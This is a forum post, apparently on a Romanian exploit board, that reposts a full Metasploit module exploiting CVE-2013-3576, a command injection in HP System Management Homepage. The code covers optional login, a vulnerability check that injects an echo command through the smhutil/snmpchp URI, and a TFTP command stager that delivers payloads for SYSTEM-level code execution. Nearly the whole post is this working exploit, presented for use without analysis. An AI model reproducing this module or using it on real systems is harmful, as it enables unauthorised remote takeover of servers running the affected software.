Jump to content
Matt

HP System Management Homepage JustGetSNMPQueue Command Injection

By Matt, in Exploituri

Recommended Posts

Matt Newbie

Matt

Posted
Posted

Author : Metasploit

Source : HP System Management Homepage JustGetSNMPQueue Command Injection

Code : 

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStagerTFTP
  include Msf::Exploit::Remote::HttpClient

  def initialize(info={})
    super(update_info(info,
      'Name'           => "HP System Management Homepage JustGetSNMPQueue Command Injection",
      'Description'    => %q{
        This module exploits a vulnerability found in HP System Management Homepage.  By
        supplying a specially crafted HTTP request, it is possible to control the
        'tempfilename' variable in function JustGetSNMPQueue (found in ginkgosnmp.inc),
        which will be used in a exec() function.  This results in arbitrary code execution
        under the context of SYSTEM.  Please note: In order for the exploit to work, the
        victim must enable the 'tftp' command, which is the case by default for systems
        such as Windows XP, 2003, etc.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Markus Wulftange',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          ['CVE', '2013-3576'],
          ['OSVDB', '94191'],
          ['US-CERT-VU', '735364']
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00"
        },
      'DefaultOptions' =>
        {
          'SSL' => true
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows', {}],
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 11 2013",
      'DefaultTarget'  => 0))

    register_options(
      [
        Opt::RPORT(2381),
        # USERNAME/PASS may not be necessary, because the anonymous access is possible
        OptString.new("USERNAME", [false, 'The username to authenticate as']),
        OptString.new("PASSWORD", [false, 'The password to authenticate with'])
      ], self.class)
  end


  def peer
    "#{rhost}:#{rport}"
  end


  def check
    cookie = ''

    if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
      cookie = login
      if cookie.empty?
        print_error("#{peer} - Login failed")
        return Exploit::CheckCode::Safe
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end

    sig = Rex::Text.rand_text_alpha(10)
    cmd = Rex::Text.uri_encode("echo #{sig}")
    uri = normalize_uri("smhutil", "snmpchp/") + "&{cmd}&&echo"

    req_opts = {}
    req_opts['uri'] = uri
    if not cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{cookie}; #{browser_chk}; #{curl_loc}"
    end

    res = send_request_raw(req_opts)
    if not res
      print_error("#{peer} - Connection timed out")
      return Exploit::CheckCode::Unknown
    end

    if res.body =~ /SNMP data engine output/ and res.body =~ /#{sig}/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end


  def login
    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    cookie = ''

    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => '/proxy/ssllogin',
      'vars_post' => {
        'redirecturl'         => '',
        'redirectquerystring' => '',
        'user'                => username,
        'password'            => password
      }
    })

    if not res
      fail_with(Exploit::Failure::Unknown, "#{peer} - Connection timed out during login")
    end

    # CpqElm-Login: success
    if res.headers['CpqElm-Login'].to_s =~ /success/
      cookie = res.headers['Set-Cookie'].scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
    end

    cookie
  end


  def setup_stager
    execute_cmdstager({ :temp => '.'})
  end


  def execute_command(cmd, opts={})
    # Payload will be: C:\hp\hpsmh\data\htdocs\smhutil
    uri = Rex::Text.uri_encode("#{@uri}#{cmd}&&echo")

    req_opts = {}
    req_opts['uri'] = uri
    if not @cookie.empty?
      browser_chk = 'HPSMH-browser-check=done for this session'
      curl_loc    = "curlocation-#{datastore['USERNAME']}="
      req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
    end

    print_status("#{peer} - Executing: #{cmd}")
    res = send_request_raw(req_opts)
  end


  def exploit
    @cookie = ''

    if not datastore['USERNAME'].to_s.empty? and not datastore['PASSWORD'].to_s.empty?
      @cookie = login
      if @cookie.empty?
        fail_with(Exploit::Failure::NoAccess, "#{peer} - Login failed")
      else
        print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
      end
    end

    @uri = normalize_uri('smhutil', 'snmpchp/') + "&&"
    setup_stager
  end
end

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...